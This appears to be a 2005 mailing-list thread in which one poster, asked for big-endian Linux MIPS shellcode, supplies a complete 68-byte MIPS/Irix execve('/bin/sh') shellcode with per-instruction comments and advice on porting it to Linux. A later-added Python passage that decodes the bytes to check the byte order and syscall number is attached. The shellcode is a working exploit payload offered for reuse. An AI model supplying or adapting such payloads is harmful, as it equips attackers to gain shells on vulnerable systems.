You could base it off of this. Looks big-endian to me, based on my
somewhat limited knowledge of MIPS architecture.
/* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso */
"\xaf\xa0\xff\xfc" /* sw $zero, -4($sp) */
"\x24\x06\x73\x50" /* li $a2, 0x7350 */
"\x04\xd0\xff\xff" /* bltzal $a2, dpatch */
"\x8f\xa6\xff\xfc" /* lw $a2, -4($sp) */
/* a2 = (char **) envp = NULL */
"\x24\x0f\xff\xcb" /* li $t7, -53 */
"\x01\xe0\x78\x27" /* nor $t7, $t7, $zero */
"\x03\xef\xf8\x21" /* addu $ra, $ra, $t7 */
/* a0 = (char *) pathname */
"\x23\xe4\xff\xf8" /* addi $a0, $ra, -8 */
/* fix 0x42 dummy byte in pathname to shell */
"\x8f\xed\xff\xfc" /* lw $t5, -4($ra) */
"\x25\xad\xff\xbe" /* addiu $t5, $t5, -66 */
"\xaf\xed\xff\xfc" /* sw $t5, -4($ra) */
/* a1 = (char **) argv */
"\xaf\xa4\xff\xf8" /* sw $a0, -8($sp) */
"\x27\xa5\xff\xf8" /* addiu $a1, $sp, -8 */
"\x24\x02\x04\x23" /* li $v0, 1059 (SYS_execve) */
"\x01\x01\x01\x0c" /* syscall */
"\x2f\x62\x69\x6e" /* .ascii "/bin" */
"\x2f\x73\x68\x42" /* .ascii "/sh", .byte 0xdummy */
If you compiled a C program like this for linux-mips:
#include <unistd.h>

int main(void)
{
    execve("/bin/sh", NULL, NULL);
    return 0;
}
You should be able to see what's going on.
I'd imagine that linux syscall wants you to put arguments in $a0,
$a1, etc, and syscall number in $v0. This is how the MIPS calling
conventions are, I think, so I would imagine linux respects them. It
might be as simple as changing the syscall number.
On Dec 15, 2005, at 6:04 PM, Roman Medina-Heigl Hernandez wrote:
> Hi,
>
> Does somebody have shellcode for linux-mips (MSB)?
>
> I found this for LSB (Little Endian) Cobalt:
> http://www.milw0rm.com/id.php?id=1306
>
> I'd like to play with Broadcom chipset and MSB (Big Endian)...
>
> --
>
> Regards,
> -Roman
>
> PGP Fingerprint:
> 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
> [Key ID: 0xEAD56742. Available at KeyServ]
Received on Dec 17 2005
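A quick way to check the two claims made in the reply above (that the listing is big-endian, and that the syscall number is the value loaded into $v0 right before the syscall instruction) is to decode the 68 bytes as 32-bit MIPS words under both byte orders. This is an added Python example, not code from the thread; the SHELLCODE bytes are re-typed from the listing above, and the decoder only knows the handful of instruction encodings that listing uses, so it is an analysis aid rather than a general MIPS disassembler.

```python
import struct

# Bytes re-typed from the listing in the reply above (17 words, 68 bytes).
SHELLCODE = bytes.fromhex(
    "afa0fffc 24067350 04d0ffff 8fa6fffc 240fffcb 01e07827 03eff821 23e4fff8 "
    "8fedfffc 25adffbe afedfffc afa4fff8 27a5fff8 24020423 0101010c 2f62696e 2f736842"
)

I_TYPE = {0x08: "addi", 0x09: "addiu", 0x23: "lw", 0x2B: "sw"}  # opcode -> mnemonic
SPECIAL = {0x0C: "syscall", 0x21: "addu", 0x27: "nor"}          # funct -> mnemonic (opcode 0)


def decode_word(w):
    """Return (mnemonic, rs, rt, imm) for the encodings the listing uses, else None."""
    op, rs, rt = w >> 26, (w >> 21) & 0x1F, (w >> 16) & 0x1F
    imm = (w & 0xFFFF) - (0x10000 if w & 0x8000 else 0)  # sign-extend 16-bit immediate
    if op == 0:
        name = SPECIAL.get(w & 0x3F)
    elif op == 1 and rt == 0x10:     # REGIMM encoding of bltzal
        name = "bltzal"
    else:
        name = I_TYPE.get(op)
    return (name, rs, rt, imm) if name else None


def disassemble(code, big_endian=True):
    """Decode every 4-byte word; unknown encodings come back as None."""
    fmt = ">I" if big_endian else "<I"
    return [decode_word(w) for (w,) in struct.iter_unpack(fmt, code)]


def syscall_number(code, big_endian=True):
    """Immediate of the last 'li $v0, n' (addiu $v0, $zero, n) before 'syscall', or None."""
    v0 = None
    for ins in disassemble(code, big_endian):
        if ins is None:
            continue
        name, rs, rt, imm = ins
        if name in ("addi", "addiu") and rs == 0 and rt == 2:  # $v0 is register 2
            v0 = imm
        elif name == "syscall":
            return v0
    return None


def looks_big_endian(code):
    """Crude check: the byte order under which more words decode to known instructions."""
    be = sum(i is not None for i in disassemble(code, True))
    le = sum(i is not None for i in disassemble(code, False))
    return be > le
```

Under big-endian decoding the words line up with the comments in the listing and the syscall number comes out as 1059 (SYS_execve on Irix, as the listing says); under little-endian decoding most words are not valid instructions and no syscall is found.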